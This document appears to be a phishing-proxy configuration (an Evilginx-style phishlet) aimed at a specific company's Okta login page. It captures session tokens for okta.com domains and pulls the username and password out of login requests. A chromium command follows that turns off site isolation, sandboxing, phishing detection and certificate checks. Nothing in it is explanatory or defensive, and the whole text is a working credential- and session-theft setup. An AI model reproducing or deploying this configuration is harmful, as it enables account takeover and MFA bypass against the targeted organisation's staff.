min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'uber', orig_sub: 'uber', domain: 'okta.com', session: true, is_landing: true} sub_filters: auth_tokens: - domain: '.okta.com' keys: ['.*: regexp'] - domain: 'okta.com' keys: ['.*: regexp'] - domain: 'uber.okta.com' keys: ['.*: regexp'] auth_urls: - '/auth/login' credentials: username: key: 'identifier' search: '(.*)' type: 'json' password: key: 'passcode' search: '(.*)' type: 'json' login: domain: 'uber.okta.com' path: '/' chromium \ --disable-web-security \ --disable-site-isolation-trials \ --disable-features=IsolateOrigins,site-per-process,SameSiteByDefaultCookies,CookiesWithoutSameSiteMustBeSecure \ --allow-running-insecure-content \ --disable-popup-blocking \ --disable-extensions \ --disable-infobars \ --disable-translate \ --disable-sync \ --disable-background-networking \ --disable-client-side-phishing-detection \ --disable-default-apps \ --disable-hang-monitor \ --disable-prompt-on-repost \ --disable-component-update \ --disable-domain-reliability \ --disable-features=NetworkService,NetworkServiceInProcess \ --disable-features=BlockInsecurePrivateNetworkRequests \ --no-sandbox \ --disable-setuid-sandbox \ --ignore-certificate-errors \ --ignore-ssl-errors \ --ignore-certificate-errors-spki-list \ --allow-insecure-localhost \ --user-data-dir="/tmp/chromium_test"